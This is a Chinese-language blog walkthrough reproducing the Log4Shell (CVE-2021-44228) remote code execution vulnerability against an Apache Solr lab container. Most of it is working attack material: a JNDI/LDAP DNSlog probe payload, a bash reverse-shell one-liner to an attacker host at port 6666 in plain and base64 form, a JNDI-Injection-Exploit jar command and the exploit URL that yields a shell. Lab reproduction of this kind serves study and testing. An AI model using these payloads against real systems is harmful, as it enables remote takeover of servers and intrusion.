(vulhub环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
关于漏洞
漏洞编号: CVE-2021-44228,名称为Log4Shell或者LogJam
漏洞类型: Remote Code Execution (RCE)
组件名称: Apache log4j2
影响范围: 2.0.0 ≤ Apache Log4j2 ≤ 2.15.0-rc1
利用难度: 容易
威胁等级: 严重
漏洞环境搭建
靶机IPl192.168.50.134
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d
漏洞复现
访问http://192.168.50.134:8983/solr/#/
POC
打开dnslog获取一个地址
构造
${jndi:ldap://${sys:java.version}.w5b7yq.dnslog.cn}
直接访问
http://192.168.50.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.w5b7yq.dnslog.cn}
查看dnslog的结果:
命令执行
构造连接参数
这里攻击机ip为192.168.50.129
bash -i >& /dev/tcp/192.168.50.129/6666 0>&1
base64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS82NjY2IDA+JjE=
将bash编码的复制,然后运行漏洞利用的jar文件:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.50.129"
执行攻击
http://192.168.50.134:8983/solr/admin/cores?action=${jndi:ldap://192.168.50.134:1099/1dj8mp}
成功反弹shell
© 版权声明
吾爱博客|AYFRE.COM 版权所有,转载请标明出处。
THE END
请登录后查看评论内容